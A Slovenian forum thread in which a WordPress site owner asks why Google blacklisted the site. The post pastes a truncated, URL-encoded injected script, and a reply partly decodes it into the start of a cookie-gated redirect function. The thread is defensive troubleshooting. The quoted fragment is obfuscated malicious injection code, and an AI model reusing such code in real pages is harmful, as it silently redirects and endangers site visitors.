WordPress Malware
3 naročniki
3 naročniki
Google mi je blacklistal spletno stran z WP z naslednjo razlago, da se na indexu pojavlja zlonamerna koda:
<script language="javascript"> document.write( unescape( '%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54%44%20%48%54%4D%4C%20%34%2E%30%31%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F%68%74%6D%6C%34%2F%6C%6F%6F%73%65%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%69%73%6F%2D%38%38%35%39%2D%31%22%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%0A%66%75%6E%63%74%69%6F%6E%20%72%65%64%69%72%65%63%74%28%29%0A%7B%0A%76%61%72%20%74%68%65%63%6F%6F%6B%69%65%20%3D%20%72%65%61%64%43%6F%6F%6B%69%65%28%27%64%6F%52%65%64%69%72%65%63%74%27%29%3B%0A%69%66%28%21%74%68%65%63%6F%6F%6B%69%65%29%0A%7B%0A%20%20%20%20%20%76%61%72%20%68%65%61%64%3D
Updatane imam vse plugine, jedro, prav tako Sucuri in Wordfence ne najdeta nič sumljivega v datotekah, prav tako ni nič vidno v sourceu.
Any idea?
3 odgovori
Imaš celotno to "zlonamerno" kodo? Dekodiraj jo...
Del ki si ga kopiral je:
<script language="javascript"> document.write( unescape( '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script type="text/javascript">
<!--
function redirect()
{
var thecookie = readCookie('doRedirect');
if(!thecookie)
{
var head=
Mogoče je vseeno kakšen plugin porinil kaj, ni vse da je updejtano, če je nek XY razvijalec ti lahko doda karkoli.